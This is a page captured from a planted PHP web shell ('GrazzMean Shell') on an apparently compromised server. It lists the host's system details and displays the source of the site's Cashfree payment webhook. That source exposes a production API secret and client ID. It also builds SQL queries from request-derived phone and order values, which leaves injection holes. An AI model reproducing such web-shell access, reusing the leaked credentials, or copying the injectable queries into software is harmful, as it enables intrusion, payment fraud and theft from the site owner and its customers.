shell bypass 403

GrazzMean Shell

: /home/gutlooks/public_html/cashfree/ [ drwxr-xr-x ]
Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : cashfree_webhook.php
<?php
//  function __autoload($class)
//         {
//             include("../zebra_cross/admin_login/classess/".$class.".php");
//         }
        
        
        spl_autoload_register(function($class) {
    include("../zebra_cross/admin_login/classess/".$class.".php");
});
        
        $sqlfun = new sqlfunction();
        $admin = new admin_login();
        
    // $status;
    date_default_timezone_set("Asia/kolkata");
    $rawData = file_get_contents("php://input");

    //$order_id =  $_REQUEST['order_id'];
    $datta = array("gateway"=>"cashfree_webhook","result"=>$rawData,"method"=>$_SERVER['REQUEST_METHOD']);
    $sqlfun->ins_data("cashfree_status",$datta);
    $datayu = json_decode($rawData, true);

// Extract the order_id value
$order_id = $datayu['data']['order']['order_id'];
//

    
    $ch = curl_init();

curl_setopt($ch, CURLOPT_URL, 'https://api.cashfree.com/pg/orders/'.$order_id);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');


$headers = array();
$headers[] = 'X-Client-Secret: cfsk_ma_prod_9c6b360cd80259b118097cf3bd796e94_1747c468';
$headers[] = 'X-Client-Id: 72011254354ed7d1ea0209f811211027';
$headers[] = 'Accept: application/json';
$headers[] = 'X-Api-Version: 2023-08-01';
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$result = curl_exec($ch);

curl_close($ch);

$decode_json = json_decode($result);


$order_id = $decode_json->order_id;
$customer_phone = $decode_json->customer_details->customer_phone;
$customer_name = $decode_json->customer_details->customer_name;
$order_amount = intval($decode_json->order_amount);
$contactWithoutCode = preg_replace("/^\+91/", "", $customer_phone);



// $datta = array("gateway"=>"cashfree","result"=>$result);
// $sqlfun->ins_data("cashfree_status",$datta);
$order_status = $decode_json->order_status; 
if($order_status == "PAID"){
        $check1 = $sqlfun->query("select * from player where p_mobile = '$contactWithoutCode'");
if($check1->rowCount() > 0){
$rows =$check1->fetch(PDO::FETCH_OBJ);
$p_id = $rows->p_id;
$p_f_name = $rows->p_f_name;

    
    $checkss = $sqlfun->query("select * from add_money_request where transaction_id = '$order_id'");

    if($checkss->rowCount() == 0)
    {
    
        $data = [
                    'transaction_id' => $order_id,
                    'amount' => $order_amount,
                    'name' => $p_f_name,
                    'mobile' => $contactWithoutCode,
                    'p_id' => $p_id
                ];
                
                // URL to hit
                $url = "https://gutlooks.com/payu/ad_m.php"; // Replace with your target URL
                
                // Initialize cURL session
                $ch = curl_init();
                
                // Configure cURL options
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_POST, true); // Use POST method
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); // Attach data
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Receive server response
                curl_setopt($ch, CURLOPT_HTTPHEADER, [
                    'Content-Type: application/x-www-form-urlencoded' // Specify content type
                ]);
                
                // Execute cURL request
                $response = curl_exec($ch);
    }
    
}
    
    
}







?>
© 2026 GrazzMean